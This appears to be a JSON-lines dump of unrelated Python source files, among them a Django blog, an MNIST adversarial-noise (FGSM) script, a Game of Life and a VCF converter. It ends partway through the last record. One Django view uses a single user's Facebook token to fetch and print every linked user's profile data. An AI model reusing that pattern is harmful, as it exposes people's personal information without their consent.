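# 32-bit instruction string into four bytes, least-significant byte first,
# via chr() plus an iso-8859-15 encode. int.to_bytes() expresses the same
# thing directly and avoids a real trap: iso-8859-15 cannot encode chr(0xA4)
# and a handful of other code points, so the chr()-based path can raise
# UnicodeEncodeError for some instruction words.
def pack_instructions(bit_strings):
    out = bytearray()
    for bits in bit_strings:  # e.g. '11100011...' (32 chars of '0'/'1')
        out += int(bits, 2).to_bytes(4, byteorder="little")
    return bytes(out)

ins = "11100011010000110100111100100000"
assert pack_instructions([ins]) == bytes(int(ins[i:i + 8], 2) for i in (24, 16, 8, 0))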
instructions_list.append(pattern)\n save_to_kernel(instructions_list)\n # print(' '.join([immediate_value[a:a+4] for a in range(0, len(immediate_value), 4)]))\n\ndef convertToBinary(n):\n # Function to print binary number for the input decimal using recursion\n if n > 1:\n convertToBinary(n//2)\n print(n % 2,end = '')\n\ndef save_to_kernel(arrayoflines): \n # 11100011 01000011 01001111 00100000\n strbytes = ''\n for x in arrayoflines:\n bytelis = [x[a:a+8] for a in range(0, len(x), 8)] #splits the line into 8 bit section\n bytelis = [chr(int(a, 2)) for a in reversed(bytelis)] # turns each of those 8 bit things into char\n print(bytelis)\n strbytes += ''.join(bytelis) #combines all those characters to one line\n print(strbytes)\n file = open('kernel7.img', 'wb+') #write in byte form\n file.write(strbytes.encode('iso-8859-15')) #once it writes it above -> encoding turns into the format we want for the kernel file\n\ndef read_parser():\n filepath = 'pseudo.txt'\n with open(filepath) as fp:\n line = fp.readline()\n cnt = 0\n instructions = []\n while line:\n instructions.append(line.strip().split())\n line = fp.readline()\n cnt += 1\n return instructions\n\nconduct(read_parser())\n\n\n\n\n ","sub_path":"blinking_led.py","file_name":"blinking_led.py","file_ext":"py","file_size_in_byte":4893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"612671635","text":"\nimport os\n\nimport bs4\nimport dill\nfrom spamclassifier import get_features\nAPP = os.path.abspath(__file__)\nAPP_DIR, APP_NAME = os.path.split(APP)\n\nclassifier_file_path = os.path.join(APP_DIR, 'saved_classifier', 'spam_classifier.pickle')\nclassifier_file = open(classifier_file_path, 'rb')\nclassifier_object = dill.load(classifier_file)\nclassifier_file.close()\n\n\ndef ham_or_spam(input_text):\n \"\"\"\n :param input_text: the passed input text to be classified\n :returns: Whether the passed input is a spam, ham or giving\n UnicodeEncodeError\n \"\"\"\n try:\n input_text = bs4.UnicodeDammit.detwingle(\n input_text).decode('utf-8')\n input_text = input_text.encode('ascii', 'ignore')\n\n hamorspam = classifier_object.classify(get_features(input_text,''))\n response = {'category': hamorspam, 'status': 'ok'}\n\n print (\"TEXT: '{0}' :: RESPONSE : '{1}'\".format(\n input_text.replace(\"\\n\", \" \").replace(\"\\r\", \" \"),\n hamorspam\n ))\n\n return response\n except UnicodeEncodeError:\n hamorspam = 'UnicodeEncodeError'\n response = {'category': hamorspam, 'status': 'error'}\n return response\n","sub_path":"spam_utils.py","file_name":"spam_utils.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"616729514","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 14 23:48:13 2016\n\n@author: Glaucia\n\"\"\"\nimport argparse\nimport re\nimport glob\n\n\ndef arguments():\n \"\"\"parsing arguments to have input file\"\"\"\n parser = argparse.ArgumentParser(description=\"\"\"my argument parser\"\"\") \n parser.add_argument('inputdirectoryname', type=str, help=\"\"\"give the entire name of the directory \n (and path) containing your files\"\"\") \n args = parser.parse_args()\n inp = args.inputdirectoryname\n return inp\n\n\ndef sumnumbersinalist (inputfile):\n \"\"\"gets and input file, reads and edits it, and sum across the integer values in this file\"\"\"\n numberslist = []\n with open(inputfile,'r') as my_file:\n for line in my_file:\n 
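# Aside (editorial note on sumnumbersinalist(), continued below): replacing
# non-word characters with spaces and then splitting on a single space
# produces empty strings whenever two separators are adjacent, and int('')
# raises ValueError. Extracting digit runs with re.findall is sturdier;
# minimal self-contained sketch:
import re

def sum_numbers(text):
    return sum(int(tok) for tok in re.findall(r"\d+", text))

assert sum_numbers("1, 2;;  3\n40") == 46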
numberslist.append(line)\n numbers = \"\".join(numberslist)\n numbers = re.sub(\"\\W\",\" \",numbers)\n finalnumbers = numbers.strip()\n finalnumbers = finalnumbers.split(\" \")\n numlist = list(map(int,finalnumbers))\n return sum(numlist)\n \n\ndef main():\n arg = arguments()\n mainresult = sum(list(map(sumnumbersinalist,glob.glob(arg +\"/*.txt\"))))\n print(mainresult)\n \n \nif __name__ == '__main__':\n main() \n","sub_path":"answers/glaudelrio/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"505471431","text":"from django.urls import path\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\napp_name = 'shop'\n\nurlpatterns = [\n path('', views.product_list, name='product_list'),\n path('/', views.product_detail, name='product_detail'),\n path('bonus/', views.bonus, name='bonus'),\n path('delivery/', views.delivery, name='delivery'),\n path('about/', views.about, name='about'),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","sub_path":"shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"337803148","text":"import math\nimport itertools as it\n\ndef sudoku_list():\n boxes = 81 - 18\n full = 100\n start = 0\n opts = [(n/boxes)*full for n in range(start, boxes+1)]\n return opts\n\ndef word_search_list():\n words = 17\n full = 100\n start = 0\n opts = [(n/words)*full for n in range(start, words+1)]\n return opts\n\ndef who_am_i_list():\n pics = 15\n full = 100\n start = 0\n opts = [(n/pics)*full for n in range(start, pics+1)]\n return opts\n\ndef greek_letters():\n letters = 22\n full = 100\n percent = 1.025\n start = 0\n opts = [(3.14)*(percent**n) for n in range(start, letters+1)]\n opts = [0.0] + opts\n return list(it.accumulate(opts))\n\ndef get_threes():\n threes = 3\n denom = 13\n full = 100\n start = 0\n opts = [(n/denom)*full for n in range(start, threes+1)]\n return opts\n\ndef diff_pi(num):\n return ((math.pi*100)-num)%1\n\ndef find_best_combination():\n sl = sudoku_list()\n wsl = word_search_list()\n wai = who_am_i_list()\n gl = greek_letters()\n th = get_threes()\n it.p = it.permutations\n corr_comb = [] #corresponding combinations\n opts = [] #options\n print(sl)\n print(wsl)\n print(wai)\n print(gl)\n print(th)\n for a in range(len(sl)): \n for b in range(len(wsl)):\n for c in range(len(wai)): \n for d in range(len(gl)):\n for e in range(len(th)):\n corr_comb.append([a,b,c,d,e])\n opts.append(diff_pi(sl[a]+wsl[b]+wai[c]+gl[d]+th[e]))\n closest = min(opts)\n index = opts.index(closest)\n c = corr_comb[opts.index(min(opts))]\n pts_list = [sl[c[0]],wsl[c[1]],wai[c[2]],gl[c[3]],th[c[4]]]\n pts = sum(pts_list)\n # print(\"Best option:\", closest)\n # print(\"Index:\", index)\n print(\"Best combination:\", c)\n print(\"Corresponding pts:\", pts_list)\n print(\"Actual points total:\", pts)\n print(\"Needed remaining:\", 314-int(pts))\n print(\"Final score:\", (314-int(pts))+pts)\n\nfind_best_combination()\n","sub_path":"progPractice/piAthlon.py","file_name":"piAthlon.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"134494759","text":"import pygame\r\nimport sys\r\nfrom pygame.locals import *\r\nfrom Vconstants import 
*\r\n\r\n\r\n\r\nsize = [SCREEN_WIDTH, SCREEN_HEIGHT]\r\nscreen = pygame.display.set_mode(size)\r\n\r\npygame.display.set_caption('WINNER!')\r\n\r\nclock = pygame.time.Clock()\r\n\r\nvbros = pygame.image.load('vbros.png')\r\ncap = pygame.image.load('capsunR2.png')\r\nframe_rate = 60\r\n\r\n\r\ndef winScreen():\r\n pygame.init()\r\n\r\n fontsize = 30\r\n font_change = 0\r\n\r\n titleFont = pygame.font.Font('freesansbold.ttf', 75)\r\n font_start = pygame.font.Font(None, fontsize)\r\n titleSurf = titleFont.render('!!WINNER!!', True, purple)\r\n # -- Attempt at growing text\r\n titleSurf2 = font_start.render('Success', True, blue)\r\n # - Hench 21 Image\r\n h21 = pygame.image.load('h21.png')\r\n h21 = pygame.transform.scale(h21, [95, 135])\r\n\r\n # -- Captain Sunshine\r\n cap_x = -230\r\n cap_y = 5\r\n\r\n capx_change = 6\r\n #capy_change =\r\n\r\n\r\n degrees1 = 0\r\n degrees2 = 0\r\n\r\n while True:\r\n\r\n cap_x += capx_change\r\n if cap_x > 1015:\r\n cap_x = -210\r\n\r\n\r\n screen.blit(pygame.transform.scale(vbros, (SCREEN_WIDTH, SCREEN_HEIGHT)), (0,0))\r\n screen.blit(cap, (cap_x, cap_y))\r\n # -- Adding Rotating Text\r\n rotatedSurf = pygame.transform.rotate(titleSurf, degrees1)\r\n rotatedRect = rotatedSurf.get_rect()\r\n rotatedRect.topleft = (200, SCREEN_HEIGHT / 2)\r\n screen.blit(rotatedSurf, rotatedRect)\r\n\r\n fontsize += font_change\r\n # - Other text\r\n #growSurf = pygame.transform.scale(titleSurf2, fontsize)\r\n growRect = titleSurf2.get_rect()\r\n growRect.topleft = (75, 200)\r\n #screen.blit(titleSurf2, growRect)\r\n\r\n #-- Add image\r\n rotate21 = pygame.transform.rotate(h21, degrees2)\r\n Rect21 = rotate21.get_rect()\r\n Rect21.topleft = (580, 390)\r\n screen.blit(rotate21, Rect21)\r\n\r\n #if checkForKeyPress():\r\n #pygame.event.get()\r\n #return\r\n pygame.display.update()\r\n clock.tick(frame_rate)\r\n degrees1 += 3\r\n degrees2 += 7\r\n font_change += 3\r\n\r\n if fontsize > 75:\r\n font_change -= 3\r\n if fontsize < 30:\r\n font_change += 3\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n","sub_path":"win_screen.py","file_name":"win_screen.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"345881436","text":"import os\n\nimport torch as T\nimport torchvision as tv\nfrom torch.autograd import Variable\n\nfrom mnist_cl import mnist_cl, criterion, test_iter, DEVICE\nfrom utils import get_cls_accuracy\n\nmodel = mnist_cl()\nmodel.load_state_dict(T.load('mnist_cl.pt'))\nmodel.train()\nmodel.to(DEVICE)\n\nsave_dir = './results/'\nos.makedirs(save_dir, exist_ok=True)\n\nfor i, (im, l) in enumerate(test_iter):\n x = Variable(T.cuda.FloatTensor(im.numpy()), requires_grad=True)\n\n l = l.to(DEVICE)\n x.grad = None\n logits = model(x)\n loss = criterion(logits, l)\n loss.backward()\n\n adv_noise = 0.2 * T.sign(x.grad.data)\n adv_x = T.clamp(x.data + adv_noise, 0, 1)\n\n tv.utils.save_image(x, save_dir + '%d.png' % i)\n tv.utils.save_image(adv_x, save_dir + '%d_adv.png' % i)\n\n with T.no_grad():\n pred2 = model(x)\n acc2 = get_cls_accuracy(pred2, l)\n pred1 = model(adv_x)\n acc1 = get_cls_accuracy(pred1, l)\n print('acc1: %.3f acc2: %.3f' % (acc1, acc2))\n","sub_path":"AdversarialSamples/mnist_fast_gradient.py","file_name":"mnist_fast_gradient.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"1642707","text":"import 
time\ndef inputTime():\n currentTime = time.strftime(\"%a %d %b %Y, %I:%M:%S, \",time.localtime())\n # Store current time in variable with format: \"Day Date, Time, \"\n return currentTime # return the variable\n\nwhile True: # while loop to continue indefinitely\n try: # try to open the file for reading\n outfile = open(\".\\hardlopers.txt\",\"r\")\n except IOError: # catch a possible error and create a file\n outfile = open(\".\\hardlopers.txt\",\"w\")\n outfile.close() # close file\n\n outfile = open(\".\\hardlopers.txt\",\"a\") # open file for appending\n naam = input(\"Geef de naam van de hardloper: \") # get input from the user\n outfile.write(inputTime() + naam + \"\\n\") # write the return value for inputTime, the name and an enter to the file\n outfile.close() # close file\n infile = open(\".\\hardlopers.txt\",\"r\") # open file for reading\n print(infile.read()) # print the entire file\n infile.close() # close file","sub_path":"Les5/prE5_4.py","file_name":"prE5_4.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"407474578","text":"import _pickle as pickle\nfrom collections import defaultdict\n\nclass Graph(object):\n 'Initialize Graph Object'\n\n def __init__(self):\n print(\"Initializing Graph Object\")\n\n try:\n pickle_file = open('imdb.pickle', 'rb')\n except IOError:\n print(\"Cannot find pickle file. Initializing new graph...\")\n self.is_pickled = False\n graph = defaultdict(set)\n else:\n print(\"Loading pickle file for scraper...\")\n self.is_pickled = True\n graph = pickle.load(pickle_file)\n pickle_file.close()\n \n self.graph = graph\n \n\n \n \n def addConnections(self, connections):\n\n if len(connections) == 0: return None\n\n for node1, node2 in connections:\n self.graph[node1].add(node2)\n \n\n def getNeighbors(self, node):\n if node == None or node == \"\": return None\n\n return self.graph[node]\n \n\n def findCommonNeighbors(self, nodes):\n\n if len(nodes) == 0: return None\n\n adj_sets = list()\n\n for node in nodes:\n adj_sets.append(self.getNeighbors(node))\n\n return list(set.intersection(*adj_sets))\n \n\n def saveGraph(self):\n\n #print(\"Serializing Search Graph with \" + str(len(self.graph.keys())) + \" keys\")\n with open('imdb.pickle', 'wb') as f:\n pickle.dump(self.graph, f)","sub_path":"IMBD/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"413834951","text":"from collections import deque\nfrom copy import deepcopy\n\n\nclass TNode(object):\n def __init__(self, data, left=None, right=None):\n self.left = left\n self.right = right\n self.data = data\n\n\ndef weave(l1, l2, prefix, results):\n if not (l1 and l2):\n p = deepcopy(prefix)\n p.extend(l1)\n p.extend(l2)\n results.append(p)\n return\n\n h1 = l1.popleft()\n prefix.append(h1)\n weave(l1, l2, prefix, results)\n prefix.pop()\n l1.appendleft(h1)\n\n h2 = l2.popleft()\n prefix.append(h2)\n weave(l1, l2, prefix, results)\n prefix.pop()\n l2.appendleft(h2)\n\n\ndef solve(bt):\n results = []\n if bt is None:\n results.append(deque())\n return results\n\n prefix = deque()\n prefix.append(bt.data)\n\n left = solve(bt.left)\n right = solve(bt.right)\n\n for l in left:\n for r in right:\n w = deque()\n weave(l, r, prefix, w)\n results.extend(w)\n\n return results\n\nif __name__ == '__main__':\n res = []\n bt = TNode(2)\n bt.left = TNode(1)\n bt.right = TNode(5)\n bt.right.right = 
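# Aside (editorial sanity check for weave()/solve() above, CTCI 4.9 "BST
# sequences"): two sequences of lengths m and n have C(m+n, m) interleavings.
# For the tree assembled in __main__ below, the left subtree yields 1
# sequence of length 1 and the right subtree yields 2 of length 3, so
# solve() should return 2 * C(4, 1) = 8 orderings in total.
from math import comb
assert 2 * comb(4, 1) == 8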
TNode(7)\n bt.right.left = TNode(4)\n f = solve(bt)\n import ipdb; ipdb.set_trace()\n pass","sub_path":"cracking_the_coding_interview/q4.9.py","file_name":"q4.9.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"492500376","text":"import pprint\r\n\r\ndef makeGrid(width, height, default):\r\n grid = [default] * height\r\n for i in range(height):\r\n row = [default] * width\r\n grid[i] = row\r\n return grid\r\n\r\ndef gridWidth(grid):\r\n return len(grid[0])\r\n\r\ndef gridHeight(grid):\r\n return len(grid)\r\n\r\ndef makeLife(x, y, grid):\r\n grid[y][x] = 1\r\n\r\ndef kill(x, y, grid):\r\n grid[y][x] = 0\r\n\r\ndef cellValue(x, y, grid):\r\n return grid[y][x]\r\n\r\ndef isAlive(x, y, grid):\r\n return 1 == cellValue(x, y, grid)\r\n\r\ndef isDead(x, y, grid):\r\n return 0 == cellValue(x, y, grid)\r\n\r\ndef nextGen(grid):\r\n newGrid = makeGrid(gridWidth(grid), gridHeight(grid), 0)\r\n for y in range(gridHeight(grid)):\r\n for x in range(gridWidth(grid)):\r\n if updateCel(x, y, grid) == 'alive':\r\n makeLife(x, y, newGrid)\r\n else:\r\n kill(x, y, newGrid)\r\n return newGrid\r\n\r\ndef updateCel(x, y, grid):\r\n aliveNeighbors = 0\r\n gridw = gridWidth(grid)\r\n gridh = gridHeight(grid)\r\n def updateCount(xn, yn):\r\n nonlocal aliveNeighbors\r\n if not (xn < 0 or yn < 0 or xn >= gridh or yn >= gridh):\r\n if isAlive(xn, yn, grid):\r\n aliveNeighbors += 1\r\n def scanNeighbors():\r\n updateCount(x - 1, y - 1)\r\n updateCount(x, y - 1)\r\n updateCount(x + 1, y - 1)\r\n updateCount(x - 1, y)\r\n updateCount(x + 1, y)\r\n updateCount(x - 1, y + 1)\r\n updateCount(x, y + 1)\r\n updateCount(x + 1, y + 1)\r\n scanNeighbors()\r\n if isDead(x, y, grid):\r\n if aliveNeighbors == 3:\r\n return 'alive'\r\n else:\r\n if aliveNeighbors < 2 or aliveNeighbors > 3:\r\n return 'dead'\r\n else:\r\n return 'alive'\r\n\r\ndef printGame(grid):\r\n for row in grid:\r\n for el in row:\r\n if el == 0:\r\n print('.', end=' ')\r\n else:\r\n print('*', end=' ')\r\n print('')\r\n print('')\r\n\r\ndef showGenerations(grid, i):\r\n for gen in range(i):\r\n print('Generation ' + str(gen))\r\n grid = nextGen(grid)\r\n printGame(grid)\r\n print('')\r\n\r\ngrid = makeGrid(25, 25, 0)\r\n\r\ndef testShip(grid):\r\n makeLife(4, 2, grid)\r\n makeLife(4, 3, grid)\r\n makeLife(4, 4, grid)\r\n makeLife(3, 4, grid)\r\n makeLife(2, 3, grid)\r\n\r\ndef testLine(grid):\r\n makeLife(5, 5, grid)\r\n makeLife(5, 6, grid)\r\n makeLife(5, 7, grid)\r\n\r\ntestShip(grid)\r\nshowGenerations(grid, 3)\r\n\r\n","sub_path":"gameOfLife.py","file_name":"gameOfLife.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"225490541","text":"## A script to convert the shapit output into VCF format which can be parsed by to Rob's script (vcf2fasta.py) Whic hI've adapted into taking phased data\n\n\nimport argparse, sys\n\nparser = argparse.ArgumentParser(description=\"\"\"write a VCF-format file from the output of shapeit\"\"\")\nparser.add_argument('haps_file', help='the haplotype output (*.haps) of ShapeIt2 (assemble mode)')\nparser.add_argument('sample_file', help='the sample output (*.sample) of ShapeIt2 (assemble mode)')\nparser.add_argument('out_file', help='the name of the output file to write')\nargs = parser.parse_args()\n\nhaps = args.haps_file\nsamplefile = args.sample_file\noutput = args.out_file\n\nsamples = []\n\ny=0\nwith open(samplefile, 'rt') as 
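# Aside (editorial fix sketch): updateCel() in gameOfLife.py above bounds
# BOTH coordinates with gridh (`xn >= gridh or yn >= gridh`) even though
# gridWidth() is computed, so neighbours in the extra columns of a
# non-square grid are silently dropped. Self-contained corrected count,
# with w bounding x and h bounding y:
def alive_neighbors(x, y, grid):
    h, w = len(grid), len(grid[0])
    count = 0
    for dy in (-1, 0, 1):
        for dx in (-1, 0, 1):
            if dx == dy == 0:
                continue
            nx, ny = x + dx, y + dy
            if 0 <= nx < w and 0 <= ny < h:
                count += grid[ny][nx]
    return count

blinker = [[0, 1, 0],
           [0, 1, 0],
           [0, 1, 0]]
assert alive_neighbors(1, 1, blinker) == 2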
s:\n\tfor i in s:\n\t\ty+=1\n\t\tif y <= 2:\n\t\t\tcontinue\n\t\tsamples.append(i.strip().split()[0])\n\ncounter=0\nwith open(haps, 'rt') as f_in, open(output, 'wt') as f_out:\n\n\tf_out.write('\\t'.join(['#CHROM', 'POS', 'ID', 'REF', 'ALT', 'QUAL', 'FILTER', 'INFO', 'FORMAT'] + samples) + '\\n')\n\n\tfor i in f_in:\n\t\tcounter +=1\n\t\titems = i.strip(\"\\n\").split(\" \")\n\n\t\ttry:\n\t\t\tc = int(items[0])\n\t\t\tchrom = \"chr\" +str(c)\n\t\texcept ValueError:\n\t\t\tc = items[0]\n\t\t\tchrom = c\n\t\tpos = items[2]\n\t\tname = items[1]\n\t\tref= items[3]\n\t\talt =items[4]\n\t\thaplotypes = items[5:]\n\t\tgenotypes = [\"|\".join(haplotypes[i:i+2]) for i in range(0, len(haplotypes), 2)]\n\t\t## This little doozy, takes every phased haplotype and crams them back into genotypes that can then be used to generate FASTA sequences, which can then, in turn, be put into LDhelmet\n\t\t#print genotypes\n\t\toutline = [chrom,pos,name,ref, alt,\".\",\"PASS\",\".\", \"GT\"] + genotypes\n\t\tf_out.write(\"\\t\".join(outline)+\"\\n\")\n","sub_path":"shapeit_2_vcf.py","file_name":"shapeit_2_vcf.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"236186177","text":"'''Design python application which contains two threads named as thread1 and thread2.\r\nThread1 display 1 to 50 on screen and thread2 display 50 to 1 in reverse order on\r\nscreen. After execution of thread1 gets completed then schedule thread2.'''\r\n\r\nfrom threading import *\r\nfrom time import sleep\r\n\r\ndef ForwardOrder(num):\r\n print(\"Forward Order\")\r\n for i in range(1,num+1):\r\n print(i , end = \" \")\r\n \r\ndef ReverseOrder(num):\r\n print(\"Reverse Order\")\r\n for i in range(num,0,-1):\r\n print(i ,end = \" \")\r\n\r\ndef main():\r\n\r\n\r\n thread1 = Thread(target=ForwardOrder,args=[50],)\r\n thread2 = Thread(target=ReverseOrder, args=[50],)\r\n\r\n thread1.start()\r\n sleep(2)\r\n print()\r\n thread2.start()\r\n \r\n \r\n thread1.join()\r\n thread2.join()\r\n \r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"Assignment_8_Python/Assignment_8_5.py","file_name":"Assignment_8_5.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"91760059","text":"import matplotlib.pyplot as plt\nimport nibabel as nib\nimport scipy.ndimage as ndimage\nimport numpy as np\n\nbrain = nib.load(r'F:\\Hila\\Ax3D_Pack\\V6\\v7calibration\\TheBase4Ever\\YA_lab_Yaniv_002417_20210309_1521\\r20210309_152115T1wMPRAGERLs008a1001_brain.nii').get_fdata()\noverlay = nib.load(r'F:\\Hila\\Ax3D_Pack\\V6\\v7calibration\\TheBase4Ever\\YA_lab_Yaniv_002417_20210309_1521\\ADD_along_streamlines_WMmasked.nii').get_fdata()\ni=62 #or slice 62\n\nrot_brain = np.swapaxes(brain[i,:,:],1,0)\nrot_overlay = np.swapaxes(overlay[i,:,:],1,0)\nrot_brain = rot_brain[::-1,::-1]\nrot_overlay = rot_overlay[::-1,::-1]\n\nrot_overlay[rot_overlay<5] = np.nan\n\nrot_overlay[0:30,:] = np.nan\nrot_overlay[47:,:] = np.nan\nrot_overlay[:,82:] = np.nan\nrot_overlay[41:49,50:73] = np.nan\n\nfig, ax = plt.subplots()\n\nim1 = ax.imshow(rot_brain,cmap=plt.cm.get_cmap('gray'))\n\nim2 = ax.imshow(rot_overlay,cmap=plt.cm.get_cmap('hot').reversed(),vmin=6,vmax=12) #or 8 to 10\ncbar = ax.figure.colorbar(im2, ax=ax, ticks=[],shrink=0.7, 
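# Aside (editorial sketch): the genotype comprehension in shapeit_2_vcf.py
# above regroups consecutive haplotype columns into per-sample "a|b" pairs.
# An equivalent, arguably clearer zip() formulation over even/odd columns:
haps = ["0", "1", "1", "1", "0", "0"]  # two phased alleles per sample
genotypes = ["|".join(pair) for pair in zip(haps[::2], haps[1::2])]
assert genotypes == ["0|1", "1|1", "0|0"]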
aspect=15)\nplt.tight_layout()\nplt.axis('off')\nplt.show()","sub_path":"figure_creation_scripts/average_add_slice_vis.py","file_name":"average_add_slice_vis.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"35920668","text":"import requests\nfrom urllib.parse import quote_plus\n\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect, Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.utils import timezone\n\nfrom .forms import PostForm\nfrom .models import Post\n\ndef post_create(request):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\traise Http404\n\t\t\n\tform = PostForm(request.POST or None, request.FILES or None)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.user = request.user\n\t\tinstance.save()\n\t\t# message success\n\t\tmessages.success(request, \"Successfully Created\")\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\tcontext = {\n\t\t\"form\": form,\n\t}\n\treturn render(request, \"posts/post_form.html\", context)\n\ndef post_detail(request, slug=None):\n\tinstance = get_object_or_404(Post, slug=slug)\n\tif instance.publish > timezone.now().date() or instance.draft:\n\t\tif not request.user.is_staff or not request.user.is_superuser:\n\t\t\traise Http404\n\tshare_string = quote_plus(instance.content)\n\tcontext = {\n\t\t\"title\": instance.title,\n\t\t\"instance\": instance,\n\t\t\"share_string\": share_string,\n\t}\n\treturn render(request, \"posts/post_detail.html\", context)\n\n\nfrom allauth.socialaccount.models import SocialAccount, SocialToken\ndef post_list(request):\n\tfball = SocialAccount.objects.filter(provider = 'facebook')\n\tfbid = SocialAccount.objects.filter(user=request.user, provider = 'facebook').first()\n\tsocial_token = SocialToken.objects.filter(\n\t\taccount__user = request.user, \n\t\taccount__provider = 'facebook').first()\n\tprint(fbid)\n\tuid = fbid.uid\n\ttoken = social_token.token\n\n\tbase_url = 'https://graph.facebook.com/v2.5/'\n\t# basic_info = \"{base_url}{fb_uid}?fields=id,name,picture,education,work&format=json\".format(\n\t# \tbase_url = base_url,\n\t# \tfb_uid = uid)\n\t# plus_token = \"{basic_info}&access_token={token}\".format(basic_info = basic_info, token=token)\n\t# r = requests.get(plus_token)\n\t# print(r.status_code)\n\t# print(r.json())\n\n\t### You can have this sort of function that runs every night, that updates information\n\tfor u in fball: \n\t\tbasic_info = \"{base_url}{fb_uid}?fields=id,name,picture,education,work&format=json\".format(\n\t\t\tbase_url = base_url,\n\t\t\tfb_uid = u.uid)\n\t\tplus_token = \"{basic_info}&access_token={token}\".format(basic_info = basic_info, token=token)\n\t\tr = requests.get(plus_token)\n\t\tprint(r.status_code)\n\t\tprint(r.json())\n\n\ttoday = timezone.now().date()\n\tqueryset_list = Post.objects.active() #.order_by(\"-timestamp\")\n\tif request.user.is_staff or request.user.is_superuser:\n\t\tqueryset_list = Post.objects.all()\n\t\n\tquery = request.GET.get(\"q\")\n\tif query:\n\t\tqueryset_list = queryset_list.filter(\n\t\t\t\tQ(title__icontains=query)|\n\t\t\t\tQ(content__icontains=query)|\n\t\t\t\tQ(user__first_name__icontains=query) |\n\t\t\t\tQ(user__last_name__icontains=query)\n\t\t\t\t).distinct()\n\tpaginator = 
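# Aside (editorial sketch, assumes Django is installed): the pagination
# fallbacks in post_list() here are easy to exercise without a database,
# because Paginator accepts any sequence. Note the inline comment in the
# source says "Show 25 contacts per page" while the code paginates by 8.
from django.core.paginator import Paginator

p = Paginator(list(range(30)), 8)
assert p.num_pages == 4
assert list(p.page(4).object_list) == [24, 25, 26, 27, 28, 29]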
Paginator(queryset_list, 8) # Show 25 contacts per page\n\tpage_request_var = \"page\"\n\tpage = request.GET.get(page_request_var)\n\ttry:\n\t\tqueryset = paginator.page(page)\n\texcept PageNotAnInteger:\n\t\t# If page is not an integer, deliver first page.\n\t\tqueryset = paginator.page(1)\n\texcept EmptyPage:\n\t\t# If page is out of range (e.g. 9999), deliver last page of results.\n\t\tqueryset = paginator.page(paginator.num_pages)\n\n\n\tcontext = {\n\t\t\"object_list\": queryset, \n\t\t\"title\": \"List\",\n\t\t\"page_request_var\": page_request_var,\n\t\t\"today\": today,\n\t}\n\treturn render(request, \"posts/post_list.html\", context)\n\n\n\n\n\ndef post_update(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\traise Http404\n\tinstance = get_object_or_404(Post, slug=slug)\n\tform = PostForm(request.POST or None, request.FILES or None, instance=instance)\n\tif form.is_valid():\n\t\tinstance = form.save(commit=False)\n\t\tinstance.save()\n\t\tmessages.success(request, \"Item Saved\", extra_tags='html_safe')\n\t\treturn HttpResponseRedirect(instance.get_absolute_url())\n\n\tcontext = {\n\t\t\"title\": instance.title,\n\t\t\"instance\": instance,\n\t\t\"form\":form,\n\t}\n\treturn render(request, \"posts/post_form.html\", context)\n\n\n\ndef post_delete(request, slug=None):\n\tif not request.user.is_staff or not request.user.is_superuser:\n\t\traise Http404\n\tinstance = get_object_or_404(Post, slug=slug)\n\tinstance.delete()\n\tmessages.success(request, \"Successfully deleted\")\n\treturn redirect(\"posts:list\")\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"283283454","text":"from collections import Counter\r\n\r\ndef solucao(entrada):\r\n entrada = ''.join(filter(str.isalpha, entrada))\r\n count = Counter(entrada.lower())\r\n keys = sorted(count)\r\n\r\n max_val = max(count.values())\r\n res = ''\r\n\r\n for i in keys:\r\n if count[i] == max_val:\r\n res += i\r\n\r\n print(res)\r\n return res\r\n\r\nn = 